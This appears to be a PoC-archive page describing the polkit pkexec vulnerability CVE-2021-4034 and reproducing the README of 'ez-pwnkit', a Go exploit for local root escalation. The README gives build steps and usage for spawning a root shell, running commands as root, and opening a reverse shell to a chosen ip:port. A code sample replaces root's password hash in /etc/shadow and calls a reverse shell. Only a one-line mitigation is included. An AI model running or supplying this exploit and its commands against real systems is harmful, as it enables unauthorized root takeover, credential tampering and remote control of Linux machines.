关联漏洞
标题:
polkit 缓冲区错误漏洞
(CVE-2021-4034)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。
描述
Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)
介绍
# ez-pwnkit
A pure-Go implementation of the **CVE-2021-4034 PwnKit** exploit.
The exploit use `syscall.ForkExec` to survive end of main program.
## Installation
```bash
git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make
```
As the exploit relies on a malicious shared library, a **PWN.so** file is generated from ***payload.go*** and embed in the resulting `exploit` executable.
The ***Makefile*** uses `sed` to temporarily change the package name of the ***payload.go*** file to `main`, hence making this ***Makefile*** Linux-only.
As the Go payload is not as reliable as the C one, the ***Makefile*** will compile the exploit with the C payload by default. You can choose to compile with the Go payload using `make build_go`.
## Usage
#### As standalone executable
```
$> ./exploit -h
Usage of ./exploit:
-c string
Run command as root in separate process
-o Pipe output of forked command to terminal
-r string
Open a reverse-shell in separate process. Format: ip:port
-s Spawn a root shell
```
The exploit can either be used with a command (`-c`), as a reverse-shell (`-r`) or spawn a root shell (`-s`).
```bash
$> ./exploit -s
sh-5.1#
```
```bash
$> ./exploit -c "cat /etc/passwd"
```
```bash
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]
```
#### As package
```go
package main
import (
"github.com/OXDBXKXO/ez-pwnkit"
)
func main() {
// Change root password to 'password'
ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)
// Open a reverse-shell
ez_pwnkit.RevShell("127.0.0.1:1337")
}
```
Note as `Command` and `RevShell` use `syscall.ForkExec` to run the exploit, resulting processes are separate from the main program and survive its end.
Although **go-PwnKit** can be imported to your project from Github, do not forget that you will execute an untrusted shared library as root. Using a locally compiled `PWN.so` is hence highly recommended. Just sayin' 😚
## Demonstration
```bash
$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#
```
## Mitigation
Patch `pkexec` if possible, otherwise disable the ***setuid*** bit on the `pkexec` binary.
```bash
chmod 0755 /usr/bin/pkexec
```
## Credits
This project is inspired by several other PoCs of the **PwnKit** exploit.
Thanks to [An00bRektn](https://github.com/An00bRektn/CVE-2021-4034) for the straight-forward exploit setup.
Thanks to [PaterGottesman](https://github.com/PeterGottesman/pwnkit-exploit) and [berdav](https://github.com/berdav/CVE-2021-4034) for the clarity of the exploit explanation.
Thanks to [dzonerzy](https://github.com/dzonerzy/poc-cve-2021-4034) for the *GIO_USE_VFS* trick.
文件快照
[4.0K] /data/pocs/5854b7975a1829b395dae7334cfbe78add4f3567
├── [4.0K] cmd
│ └── [ 652] main.go
├── [3.5K] exploit.go
├── [ 46] go.mod
├── [4.0K] internal
│ ├── [ 359] Makefile
│ ├── [3.0K] payload.c
│ ├── [2.0K] payload.go
│ └── [ 22K] PWN.so
├── [ 404] Makefile
└── [2.8K] README.md
2 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。